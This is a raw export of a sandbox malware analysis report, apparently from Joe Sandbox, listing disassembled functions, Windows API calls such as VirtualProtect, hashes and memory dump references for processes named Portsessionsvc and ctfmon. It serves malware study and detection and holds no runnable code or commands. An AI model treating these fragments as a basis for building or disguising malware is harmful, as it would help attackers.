                                                              • Opcode ID: 7cbb94571088ec023225236bfb2cb3baa21554ea5ef62be5f5f915812dc94d30
                                                              • Instruction ID: 0c2c2c6c35c6528180ee8fb316837fa7caecc3d931468e76613a0b2c114fb87e
                                                              • Opcode Fuzzy Hash: 7cbb94571088ec023225236bfb2cb3baa21554ea5ef62be5f5f915812dc94d30
                                                              • Instruction Fuzzy Hash: ABE0A932A06E4251B261327B2C0662F06409B9133CB1406AFFA209B1D3CE9C880306AF
                                                              Function 00430FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00431206,?), ref: 00430FEA
                                                              • GetLastError.KERNEL32(?), ref: 00430FF6
                                                                • Part of subcall function 00426C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00426C54
                                                              Strings
                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00430FFF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                              • API String ID: 1091760877-2248577382
                                                              • Opcode ID: 3becd15e5fad7f75d85581e793ea1598b820e63eac5668c15b2855409c02438c
                                                              • Instruction ID: 86a080f4f78456e3880e74c211af415d8a66d5bc3f63d79bc82a55a98e0e0a75
                                                              • Opcode Fuzzy Hash: 3becd15e5fad7f75d85581e793ea1598b820e63eac5668c15b2855409c02438c
                                                              • Instruction Fuzzy Hash: 3ED02B3160833036C62037296C06D6F78048B11737FA1072AF538546F7CB1C4991529E
                                                              Function 0042E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,0042DA55,?), ref: 0042E2A3
                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0042DA55,?), ref: 0042E2B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FindHandleModuleResource
                                                              • String ID: RTL
                                                              • API String ID: 3537982541-834975271
                                                              • Opcode ID: 3285ac623758a261ad85b94a97ff0f1b43bc755535b8a42849b7f49cabedbb4b
                                                              • Instruction ID: c9fce7d4ae2b87a24d8baefa348f93948b4b7f0a5117a76be55ea5f1040fe51e
                                                              • Opcode Fuzzy Hash: 3285ac623758a261ad85b94a97ff0f1b43bc755535b8a42849b7f49cabedbb4b
                                                              • Instruction Fuzzy Hash: 09C0123124071066E6305B757C0DB47AA585B00F93F05045DB541E92D6D6A9C94486A4
                                                              Function 0043E455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E467
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: UC$zC
                                                              • API String ID: 1269201914-3669336698
                                                              • Opcode ID: 2fb0078879a7a107ac2c7f880ab3998a6898d5c7f36f5dca03b45e2dd3ef4cf8
                                                              • Instruction ID: 70870b9615b87bba3b5f834e225b1569290e7c1a6eefb8803960190941225445
                                                              • Opcode Fuzzy Hash: 2fb0078879a7a107ac2c7f880ab3998a6898d5c7f36f5dca03b45e2dd3ef4cf8
                                                              • Instruction Fuzzy Hash: 35B0929165A200BC310821121902C3A0208C089F1AB30E42FBA00940C6994C0A06083A
                                                              Function 0043E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E467
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: pC$zC
                                                              • API String ID: 1269201914-763265519
                                                              • Opcode ID: d3769a11b1fdb344d1b626bea92f52391f62fa2aff6223f4682e029f3af68be2
                                                              • Instruction ID: e25f675abda3414d33d4b8566b70ca1629501204473c0a48ec21f9d7814b0787
                                                              • Opcode Fuzzy Hash: d3769a11b1fdb344d1b626bea92f52391f62fa2aff6223f4682e029f3af68be2
                                                              • Instruction Fuzzy Hash: 52B0928165A240AC3108A11A1802D3B0108C089B56B30A42FB804C10C2D9484905093B

                                                              Execution Graph

                                                              Execution Coverage:7%
                                                              Dynamic/Decrypted Code Coverage:75%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:8
                                                              Total number of Limit Nodes:1
                                                              execution_graph 7942 7ffd9b780872 7944 7ffd9b78ad20 7942->7944 7943 7ffd9b78aea8 7944->7943 7945 7ffd9b78b205 VirtualProtect 7944->7945 7946 7ffd9b78b23e 7945->7946 7947 7ffd9bb20e11 7948 7ffd9bb20e2f QueryFullProcessImageNameA 7947->7948 7950 7ffd9bb20fd4 7948->7950

                                                              Executed Functions

                                                              Function 00007FFD9B780872 Relevance: 2.0, APIs: 1, Instructions: 549COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 7ffd9b780872-7ffd9b78ad4d 2 7ffd9b78adbe-7ffd9b78adc5 0->2 3 7ffd9b78ad4f-7ffd9b78ad9c 0->3 4 7ffd9b78adc7-7ffd9b78adca 2->4 5 7ffd9b78ae0f-7ffd9b78ae72 2->5 3->5 15 7ffd9b78ad9e-7ffd9b78adb7 3->15 6 7ffd9b78adcc-7ffd9b78addf 4->6 7 7ffd9b78ae04-7ffd9b78ae0c 4->7 16 7ffd9b78ae7a-7ffd9b78aea6 call 7ffd9b78aeca 5->16 17 7ffd9b78ae74 5->17 9 7ffd9b78ade1 6->9 10 7ffd9b78ade3-7ffd9b78adf6 6->10 7->5 9->10 10->10 12 7ffd9b78adf8-7ffd9b78ae00 10->12 12->7 15->2 21 7ffd9b78af17-7ffd9b78af27 16->21 22 7ffd9b78aea8-7ffd9b78aeae 16->22 17->16 25 7ffd9b78af29-7ffd9b78af31 21->25 26 7ffd9b78af32-7ffd9b78af43 21->26 23 7ffd9b78aeb5-7ffd9b78aec9 22->23 24 7ffd9b78aeb0 22->24 24->23 25->26 27 7ffd9b78af45-7ffd9b78af4d 26->27 28 7ffd9b78af4e-7ffd9b78af8d 26->28 27->28 29 7ffd9b78affe-7ffd9b78b001 28->29 30 7ffd9b78af8f-7ffd9b78afe2 28->30 31 7ffd9b78aff3 29->31 32 7ffd9b78b003-7ffd9b78b00d 29->32 37 7ffd9b78b03d-7ffd9b78b0a4 30->37 43 7ffd9b78afe4-7ffd9b78afed 30->43 36 7ffd9b78aff5-7ffd9b78aff8 31->36 31->37 33 7ffd9b78b00f 32->33 34 7ffd9b78b011-7ffd9b78b024 32->34 33->34 34->34 40 7ffd9b78b026-7ffd9b78b02e 34->40 38 7ffd9b78affa-7ffd9b78affd 36->38 39 7ffd9b78b032-7ffd9b78b03a 36->39 45 7ffd9b78b0a6 37->45 46 7ffd9b78b0ac-7ffd9b78b0d8 call 7ffd9b78b0fc 37->46 38->29 39->37 40->39 43->31 45->46 49 7ffd9b78b149-7ffd9b78b157 46->49 50 7ffd9b78b0da-7ffd9b78b0e0 46->50 53 7ffd9b78b159-7ffd9b78b161 49->53 54 7ffd9b78b162-7ffd9b78b173 49->54 51 7ffd9b78b0e7-7ffd9b78b0fb 50->51 52 7ffd9b78b0e2 50->52 52->51 53->54 55 7ffd9b78b175-7ffd9b78b17d 54->55 56 7ffd9b78b17e-7ffd9b78b23c VirtualProtect 54->56 55->56 60 7ffd9b78b23e 56->60 61 7ffd9b78b244-7ffd9b78b26c 56->61 60->61
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2028498226.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d07c0bdb9b86a2e09a06747b448381fce5b18d4bf33b79ae32c32cb526c3d9b
                                                              • Instruction ID: bab8347454a9102e7ef615ab5528e8995f728c533dbae8f6131bbe9935801b3b
                                                              • Opcode Fuzzy Hash: 0d07c0bdb9b86a2e09a06747b448381fce5b18d4bf33b79ae32c32cb526c3d9b
                                                              • Instruction Fuzzy Hash: F402F630A0CB8D4FEB59DF68C8567E93BE1FF55311F04426EE45DC32A2DA74A8458B81
                                                              Function 00007FFD9BB20E11 Relevance: 1.8, APIs: 1, Instructions: 257COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2031997906.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffd9bb20000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID: FullImageNameProcessQuery
                                                              • String ID:
                                                              • API String ID: 3578328331-0
                                                              • Opcode ID: 22841c04666b6e02d6f06b0786a48063753df4dd752d6af5c7e1d36e41b2d006
                                                              • Instruction ID: 7eeeee1704b9183de976cb871730a76e614c4b7ea6502f71ebfbdce520b253f9
                                                              • Opcode Fuzzy Hash: 22841c04666b6e02d6f06b0786a48063753df4dd752d6af5c7e1d36e41b2d006
                                                              • Instruction Fuzzy Hash: D181B430609A8D4FEB69DF28C8557F937E1FB68315F00427EE85EC7292CA749941CB81

                                                              Non-executed Functions

                                                              Function 00007FFD9BB23688 Relevance: .1, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2031997906.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffd9bb20000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 56f9bfbf56c35ff0ef195556f87159e0f14e9dd12a84146398dad28f4fe559d7
                                                              • Instruction ID: d43a7d0caaa04368c9ad5198706efb20577927d490bdb3df4d9615be7edde2b8
                                                              • Opcode Fuzzy Hash: 56f9bfbf56c35ff0ef195556f87159e0f14e9dd12a84146398dad28f4fe559d7
                                                              • Instruction Fuzzy Hash: 9431D6A240E7C18FD7138BB48C759913FB1AF57254B0E49DBC0C18F0B3E1686A29E726

                                                              Executed Functions

                                                              Function 00007FFD9B750D48 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5\_H
                                                              • API String ID: 0-3325266018
                                                              • Opcode ID: 43ba43eef2bf21766aaf281af9e95dda714425204245929c7e9abe4e98e57a33
                                                              • Instruction ID: 0990e359256e7cd940bf53d70873a10cefc396b98680fcd53c861efbfaf50500
                                                              • Opcode Fuzzy Hash: 43ba43eef2bf21766aaf281af9e95dda714425204245929c7e9abe4e98e57a33
                                                              • Instruction Fuzzy Hash: A191F475A19A8D8FE799DFA88875BA97FE0FB56300F1001BAD04AD72E6DAB81411C740
                                                              Function 00007FFD9B750945 Relevance: .2, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc838d57fb5c7cab4301004544daddf84993360c0c29d0c17331680ac707467d
                                                              • Instruction ID: 8218cdea8fc396d879ea78fc279d73bef707543a4b53b50bc4305096d39b19e1
                                                              • Opcode Fuzzy Hash: fc838d57fb5c7cab4301004544daddf84993360c0c29d0c17331680ac707467d
                                                              • Instruction Fuzzy Hash: E741F63270D9184FE728EA9CF9999F973D1EF4532070501BBE08AC7167DD11AC8287C1
                                                              Function 00007FFD9B750960 Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c138659e6f2ad12bd5dd6ad14f7b6fa46a1b0182fc4c167755b0c57ad48ef3da
                                                              • Instruction ID: eb410da56cebcbc2dd0075a0192dad8482a6550e9c86b16416eba6949d87aa49
                                                              • Opcode Fuzzy Hash: c138659e6f2ad12bd5dd6ad14f7b6fa46a1b0182fc4c167755b0c57ad48ef3da
                                                              • Instruction Fuzzy Hash: D9312E21B5CA5D0FE75CB7AC64A6AF873C2DF98361B1401BAE40EC32F7CD189C424284
                                                              Function 00007FFD9B75116D Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3bfda3a39d4baa48c79a14f40c418c6ac1faae4a19bfffa1dc7d55e5525ec2ed
                                                              • Instruction ID: 58121a72129a670ef345771fbbd338aca89fccc5b812b650a64927793e88cfe7
                                                              • Opcode Fuzzy Hash: 3bfda3a39d4baa48c79a14f40c418c6ac1faae4a19bfffa1dc7d55e5525ec2ed
                                                              • Instruction Fuzzy Hash: 4531A431A0D64E8FDB45EBA4C8649A97BF0FF56311F0506BAD009D71A2DB79A542CB40
                                                              Function 00007FFD9B750998 Relevance: .1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 253098be561ab741130dc3b0c61eec200984cbfa866f4249a6222dea49361338
                                                              • Instruction ID: c7e940f9b0a50386ac2fe85ec7f1272d0d3dee41f3775d6b2b1ba1f82182270c
                                                              • Opcode Fuzzy Hash: 253098be561ab741130dc3b0c61eec200984cbfa866f4249a6222dea49361338
                                                              • Instruction Fuzzy Hash: 27212920B1DA5D0FE798F7AC94AA67576C2EB8C311B5501B9E40EC32F6DD549C428281
                                                              Function 00007FFD9B750C25 Relevance: .1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 32a353e193462b28e0321114d46081615293b037a552e91aa681a0282c1e65d4
                                                              • Instruction ID: 3aba8ffb3bbdff62fe9a3eaa6643644d39a3268a97b6ed6171d2f4e355738bd1
                                                              • Opcode Fuzzy Hash: 32a353e193462b28e0321114d46081615293b037a552e91aa681a0282c1e65d4
                                                              • Instruction Fuzzy Hash: 04213636A0E78D8FE722DAA8C8210DD7FA0EF53220F0602B7D044CB1E2D534264AC751
                                                              Function 00007FFD9B756CAB Relevance: .1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: add9277b5888077271a53e2258b35bd97d08d86870da8c95f1be01113a6815ac
                                                              • Instruction ID: 5de72f19e994b8219f63b9b0338491c9205ca08a011b76727c854e365954bf3a
                                                              • Opcode Fuzzy Hash: add9277b5888077271a53e2258b35bd97d08d86870da8c95f1be01113a6815ac
                                                              • Instruction Fuzzy Hash: A6211F71E19A1D8FDBA5DB88C4A06E973E1FB68340F1106BAD40DD32B1DA75AE41DB80
                                                              Function 00007FFD9B750C38 Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b73e006f0d874c8b3562a7fe9cdba1bdaa7aa95736f343ef497f20f694398332
                                                              • Instruction ID: ed17d54a70abd847034709a4c82518376d33f0afb5f50a6fa555820bbbe6db2c
                                                              • Opcode Fuzzy Hash: b73e006f0d874c8b3562a7fe9cdba1bdaa7aa95736f343ef497f20f694398332
                                                              • Instruction Fuzzy Hash: F6119E36A0E78D8FE722DBA8C9651DD7FA0EF43610F0646B7D084DB1E2D5742A4A8790
                                                              Function 00007FFD9B750C40 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b706628468dc14610f59d6fc86fd1f609b3eb1e66439671f231714a54c7b9030
                                                              • Instruction ID: 55f798c07a0126c31cc69974e68fd7dd6bf11d94f97f581b9d760f3b6d261c60
                                                              • Opcode Fuzzy Hash: b706628468dc14610f59d6fc86fd1f609b3eb1e66439671f231714a54c7b9030
                                                              • Instruction Fuzzy Hash: 3011AC36A0E7888FE712DBA8C9601D87FB0AF03610F0606A7D080DB1E2D6742A4A8740
                                                              Function 00007FFD9B754CD0 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 22c54b0e23141ff62a117cf1b554bd68175727d671e2a88091b8a67c46b53ffc
                                                              • Instruction ID: 7e929f212179cc27bd4a07348f4b1046973b9d3b9c1d3ec7805bbc2bf3b66652
                                                              • Opcode Fuzzy Hash: 22c54b0e23141ff62a117cf1b554bd68175727d671e2a88091b8a67c46b53ffc
                                                              • Instruction Fuzzy Hash: 40011E60E1DB1D4EE7B5A79888747B971D1AF48700F4202B9E45ED32B6DF686E424640
                                                              Function 00007FFD9B750C48 Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16123721570d56b30e8115fde829424da1417fe477abbbb7c17c984a226b9995
                                                              • Instruction ID: a3f766b07cfe1a0d57d0372d452efff41e2c24dadc4154ab5bfce426c31e265a
                                                              • Opcode Fuzzy Hash: 16123721570d56b30e8115fde829424da1417fe477abbbb7c17c984a226b9995
                                                              • Instruction Fuzzy Hash: 31016D35A0E7898FE712DBA8C96019C7FB0AF03614F1646E7D040DB1A2D6746A45C741
                                                              Function 00007FFD9B754D19 Relevance: .0, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction ID: f4ff542ef7353c758ebd49380c3d6ea6d75a29b0a50834d1f79e077baf638256
                                                              • Opcode Fuzzy Hash: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction Fuzzy Hash: A901FF30A1D61E8EEB29EB94D8646F532A1FF54701F1101B9D44ED31B6EA6C2B838A00
                                                              Function 00007FFD9B750C50 Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55bc1b9d0a185a2760d4aec5ae4d8636fab1db7e1f9a9aaec98aa989365b2c38
                                                              • Instruction ID: 4c375e18735e09c4b4871e7e898c0314825a2234f38f1e8acba1b46d548ac339
                                                              • Opcode Fuzzy Hash: 55bc1b9d0a185a2760d4aec5ae4d8636fab1db7e1f9a9aaec98aa989365b2c38
                                                              • Instruction Fuzzy Hash: A4015A35A0E7898FE722DBA8896429D7FB0AF03704F1546E6D080CB1A6DA786A45C741
                                                              Function 00007FFD9B754DA0 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction ID: 880fbe0bc483c9203b9fd9c73282155c6929ddbb00e406d892757ab5716508aa
                                                              • Opcode Fuzzy Hash: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction Fuzzy Hash: B8F01230B0D71D4AE674EB84A864AB93291AF55700F1102B9D90EC71F6EE5C6B874504
                                                              Function 00007FFD9B754B77 Relevance: .0, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b582adfdf13b5b2ce3f01a77c9e92d87364168dec484e52614d2b47023cfdda0
                                                              • Instruction ID: 3822293ea8169cb80140852755771279b04ad26482980f9aebdbe20df7e4230f
                                                              • Opcode Fuzzy Hash: b582adfdf13b5b2ce3f01a77c9e92d87364168dec484e52614d2b47023cfdda0
                                                              • Instruction Fuzzy Hash: BDE0D867F0EA0D0EF2A4D69804743B861C1EF58710F0603BAD04EC22B2ED581D424241
                                                              Function 00007FFD9B753276 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
